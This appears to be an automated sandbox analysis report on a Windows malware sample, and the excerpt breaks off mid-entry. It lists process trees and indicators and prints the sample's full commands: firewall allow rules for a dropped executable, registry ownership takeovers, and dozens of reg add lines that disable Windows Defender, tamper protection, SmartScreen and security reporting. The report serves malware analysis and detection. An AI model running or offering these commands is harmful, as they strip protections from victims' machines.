Token: SeBackupPrivilege	2568	SetACL64.exe
Token: SeRestorePrivilege	2568	SetACL64.exe
Token: SeTakeOwnershipPrivilege	2568	SetACL64.exe
Token: SeDebugPrivilege	1324	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	1324	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	1324	PowerRun64.exe
Token: 0	1324	PowerRun64.exe
Token: SeDebugPrivilege	3528	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	3528	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	3528	PowerRun64.exe
Token: SeDebugPrivilege	4400	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	4400	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	4400	PowerRun64.exe
Token: 0	4400	PowerRun64.exe
Token: SeDebugPrivilege	4144	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	4144	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	4144	PowerRun64.exe
Token: SeDebugPrivilege	3588	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	3588	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	3588	PowerRun64.exe
Token: 0	3588	PowerRun64.exe
Token: SeDebugPrivilege	2592	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2592	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2592	PowerRun64.exe
Token: SeDebugPrivilege	5080	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	5080	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	5080	PowerRun64.exe
Token: 0	5080	PowerRun64.exe
Token: SeDebugPrivilege	5028	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	5028	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	5028	PowerRun64.exe
Token: SeDebugPrivilege	2368	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	2368	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	2368	PowerRun64.exe
Token: 0	2368	PowerRun64.exe
Token: SeDebugPrivilege	3340	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	3340	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	3340	PowerRun64.exe
Token: SeDebugPrivilege	4368	PowerRun64.exe
Token: SeAssignPrimaryTokenPrivilege	4368	PowerRun64.exe
Token: SeIncreaseQuotaPrivilege	4368	PowerRun64.exe
Token: 0	4368	PowerRun64.exe
Token: SeDebugPrivilege	1028	PowerRun64.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4680 wrote to memory of 408	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	83
PID 4680 wrote to memory of 408	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	83
PID 4680 wrote to memory of 408	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	83
PID 4680 wrote to memory of 5040	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	85
PID 4680 wrote to memory of 5040	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	85
PID 4680 wrote to memory of 5040	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	85
PID 4680 wrote to memory of 4484	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	87
PID 4680 wrote to memory of 4484	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	87
PID 4680 wrote to memory of 4484	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	87
PID 4484 wrote to memory of 116	4484	dotNetFx40_Full_setup.exe	88
PID 4484 wrote to memory of 116	4484	dotNetFx40_Full_setup.exe	88
PID 4484 wrote to memory of 116	4484	dotNetFx40_Full_setup.exe	88
PID 4680 wrote to memory of 3624	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	95
PID 4680 wrote to memory of 3624	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	95
PID 4680 wrote to memory of 3624	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	95
PID 3624 wrote to memory of 4004	3624	dotNetFx45_Full_setup.exe	96
PID 3624 wrote to memory of 4004	3624	dotNetFx45_Full_setup.exe	96
PID 3624 wrote to memory of 4004	3624	dotNetFx45_Full_setup.exe	96
PID 4680 wrote to memory of 4776	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	103
PID 4680 wrote to memory of 4776	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	103
PID 4680 wrote to memory of 4776	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	103
PID 4776 wrote to memory of 2312	4776	cmd.exe	105
PID 4776 wrote to memory of 2312	4776	cmd.exe	105
PID 4776 wrote to memory of 904	4776	cmd.exe	106
PID 4776 wrote to memory of 904	4776	cmd.exe	106
PID 4776 wrote to memory of 5056	4776	cmd.exe	107
PID 4776 wrote to memory of 5056	4776	cmd.exe	107
PID 4776 wrote to memory of 5020	4776	cmd.exe	108
PID 4776 wrote to memory of 5020	4776	cmd.exe	108
PID 4776 wrote to memory of 3052	4776	cmd.exe	109
PID 4776 wrote to memory of 3052	4776	cmd.exe	109
PID 4776 wrote to memory of 4980	4776	cmd.exe	110
PID 4776 wrote to memory of 4980	4776	cmd.exe	110
PID 4776 wrote to memory of 4116	4776	cmd.exe	111
PID 4776 wrote to memory of 4116	4776	cmd.exe	111
PID 4680 wrote to memory of 4892	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	112
PID 4680 wrote to memory of 4892	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	112
PID 4680 wrote to memory of 4892	4680	c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe	112
PID 4892 wrote to memory of 2568	4892	cmd.exe	114
PID 4892 wrote to memory of 2568	4892	cmd.exe	114
PID 4892 wrote to memory of 1544	4892	cmd.exe	115
PID 4892 wrote to memory of 1544	4892	cmd.exe	115
PID 4892 wrote to memory of 1544	4892	cmd.exe	115
PID 4892 wrote to memory of 2396	4892	cmd.exe	116
PID 4892 wrote to memory of 2396	4892	cmd.exe	116
PID 4892 wrote to memory of 2396	4892	cmd.exe	116
PID 4892 wrote to memory of 1476	4892	cmd.exe	117
PID 4892 wrote to memory of 1476	4892	cmd.exe	117
PID 4892 wrote to memory of 1476	4892	cmd.exe	117
PID 4892 wrote to memory of 4216	4892	cmd.exe	118
PID 4892 wrote to memory of 4216	4892	cmd.exe	118
PID 4892 wrote to memory of 4216	4892	cmd.exe	118
PID 4892 wrote to memory of 4400	4892	cmd.exe	119
PID 4892 wrote to memory of 4400	4892	cmd.exe	119
PID 4892 wrote to memory of 4400	4892	cmd.exe	119
PID 4892 wrote to memory of 1152	4892	cmd.exe	120
PID 4892 wrote to memory of 1152	4892	cmd.exe	120
PID 4892 wrote to memory of 1152	4892	cmd.exe	120
PID 4892 wrote to memory of 5036	4892	cmd.exe	121
PID 4892 wrote to memory of 5036	4892	cmd.exe	121
PID 4892 wrote to memory of 5036	4892	cmd.exe	121
PID 4892 wrote to memory of 3860	4892	cmd.exe	122
PID 4892 wrote to memory of 3860	4892	cmd.exe	122
PID 4892 wrote to memory of 3860	4892	cmd.exe	122

C:\Users\Admin\AppData\Local\Temp\c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe
"C:\Users\Admin\AppData\Local\Temp\c22b74bb5b950a631aab0b48d9480861b6bcd02de2be9cbc9294c760344b430b.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4680
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=mbbyfatkrvotaiy dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\mbbyfatkrvotaiy.exe" enable=yes profile=public,private
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  PID:408
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=mbbyfatkrvotaiy dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\mbbyfatkrvotaiy.exe" enable=yes profile=public,private
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  PID:5040
- C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\dotNetFx40_Full_setup.exe
  "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\dotNetFx40_Full_setup.exe" /q /norestart
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4484
- - C:\a349b1eb03090b4a35abe7ee\Setup.exe
    C:\a349b1eb03090b4a35abe7ee\\Setup.exe /q /norestart /x86 /x64 /ia64 /web
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:116
- C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\dotNetFx45_Full_setup.exe
  "C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\dotNetFx45_Full_setup.exe" /q /norestart
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3624
- - C:\c66f28a2ba92f62644960bdbdf661f\Setup.exe
    C:\c66f28a2ba92f62644960bdbdf661f\\Setup.exe /q /norestart /x86 /x64 /web
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:4004
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\bn.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4776
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2312
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:904
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
    3⤵
    - Executes dropped EXE
    - Windows security modification
    - Suspicious use of AdjustPrivilegeToken
    PID:5056
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
    3⤵
    - Executes dropped EXE
    - Windows security modification
    - Suspicious use of AdjustPrivilegeToken
    PID:5020
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3052
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4980
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\bnz.bat
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4892
- - C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\SetACL64.exe
    SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2568
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
    3⤵
    PID:1544
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2396
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1476
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4216
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4400
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1152
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5036
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3860
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1592
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3060
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1808
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5116
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3656
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3924
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\bnn.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1736
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
    3⤵
    PID:4576
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsfD3BC.tmp\bn1.bat
  2⤵
  - System Location Discovery: System Language Discovery
  PID:444
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
    3⤵
    PID:3044
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2116
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2064
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3708
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5052
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2576
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4588
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:700
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1812
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:712
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1312
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
    3⤵
    PID:3020
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
    3⤵
    PID:804
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2900
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4692
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3016
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2488
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:4408
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:2232
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    - System Location Discovery: System Language Discovery
    PID:3684
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5012
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:628
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2960
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
    3⤵
    PID:4264
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4364
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4372
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:864
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
    3⤵
    PID:3144
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1472
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4448
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
    3⤵
    PID:2284
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
    3⤵
    PID:4436
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:368
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1028
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1960
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4360
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3624
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4484
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1448
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4084
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3140
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2328
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1368
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
    3⤵
    PID:1920
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
    3⤵
    PID:1796
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4404
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
    3⤵
    PID:5020
- - C:\Windows\SysWOW64\reg.exe
